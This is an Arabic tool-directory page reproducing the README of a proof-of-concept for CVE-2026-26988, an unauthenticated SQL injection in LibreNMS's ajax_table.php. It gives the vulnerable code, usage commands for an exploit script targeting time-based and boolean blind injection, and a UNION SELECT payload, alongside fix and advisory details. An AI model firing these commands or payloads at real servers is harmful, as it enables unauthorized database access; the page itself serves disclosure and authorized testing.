Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26988-LibreNMS-SQLi — إثبات مفهوم لاستغلال حقن SQL غير المُصادق عليه في ملف ajax_table.php الخاص بـ LibreNMS، مع توضيح تقنيات الحقن الأعمى القائم على الوقت والقائم على القيم المنطقية لاختبار الأمان المُصرح به. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

إثبات مفهوم لاستغلال حقن SQL غير المُصادق عليه في ملف ajax_table.php الخاص بـ LibreNMS، مع توضيح تقنيات الحقن الأعمى القائم على الوقت والقائم على القيم المنطقية لاختبار الأمان المُصرح به.

عرض المستودع
3منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – إثبات المفهوم (PoC) لحقن SQL غير المصادق عليه في LibreNMS

حقن SQL غير مصادق عليه في ملف ajax_table.php الخاص بـ LibreNMS عبر معامل البحث بعنوان IPv6.

  • الإصدارات المتأثرة: LibreNMS ≤ 25.12.0
  • تم الإصلاح في: LibreNMS ≥ 26.1 (commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 حرج
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (عدم تحييد العناصر الخاصة المستخدمة في أمر SQL – حقن SQL)
  • ملخص الثغرة

    يتم تقسيم معامل address عندما يكون search_type=ipv6 على / إلى عنوان وبادئة.
    يتم دمج البادئة مباشرة في استعلام SQL دون تهريب:

    root@kitploit:~
    $sql .= " AND ipv6_prefixlen = '$prefix'";
    

    علامة الاقتباس المفردة (') في جزء البادئة تسمح بالخروج من السلسلة النصية → حقن SQL تعسفي.

    مخطط تدفق الهجوم

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
        B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
        C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
        D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
        E -->|5. Execute injected query| F[Return results / error / delay]
        F -->|6. Attacker observes response / timing| A
    
        subgraph "Injection Point"
            D
        end
    
        style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

    استخدام إثبات المفهوم

    المتطلبات

    • Python 3.x
    • مكتبة requests (pip install requests)

    الاختبار الأساسي (خطأ في الصياغة / 500)

    root@kitploit:~
    python3 exploit.py http://target/librenms --test
    

    تأكيد أعمى قائم على الوقت (موصى به)

    root@kitploit:~
    python3 exploit.py http://192.168.1.50/librenms --time
    

    → إذا استغرق الاستجابة أكثر من 5–6 ثوانٍ → ثغرة قابلة للاستغلال

    اختبار أعمى قائم على القيم المنطقية

    root@kitploit:~
    python3 exploit.py http://target/librenms --boolean
    

    مثال على حمولة مخصصة

    root@kitploit:~
    python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
    

    الملفات في هذا المستودع

    • exploit.py .............. السكربت الرئيسي لإثبات المفهوم (أعد تسميته من cve-2026-26988-poc.py إذا لزم الأمر)
    • README.md ............... هذا الملف

    الإفصاح المسؤول

    • تم الإبلاغ: فبراير 2026 (عبر GitHub Security Advisory)
    • تم الإصلاح في: commit 15429580baba... → PR #18777
    • الاستشارة: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

    إشعار قانوني وأخلاقي

    يُقدَّم إثبات المفهوم هذا لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

    لا تستخدم هذا الكود ضد أي نظام أو شبكة دون إذن كتابي صريح من المالك.
    قد ينتهك الاستخدام غير المصرح به القوانين بما في ذلك (على سبيل المثال لا الحصر) قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) في الولايات المتحدة، أو التشريعات المماثلة في بلدك.

    استخدمه على مسؤوليتك الخاصة.


    المؤلف: Mohammed Idrees Banyamer
    إنستغرام: @banyamer_security
    التاريخ: 20 فبراير 2026

    تنزيل الأداة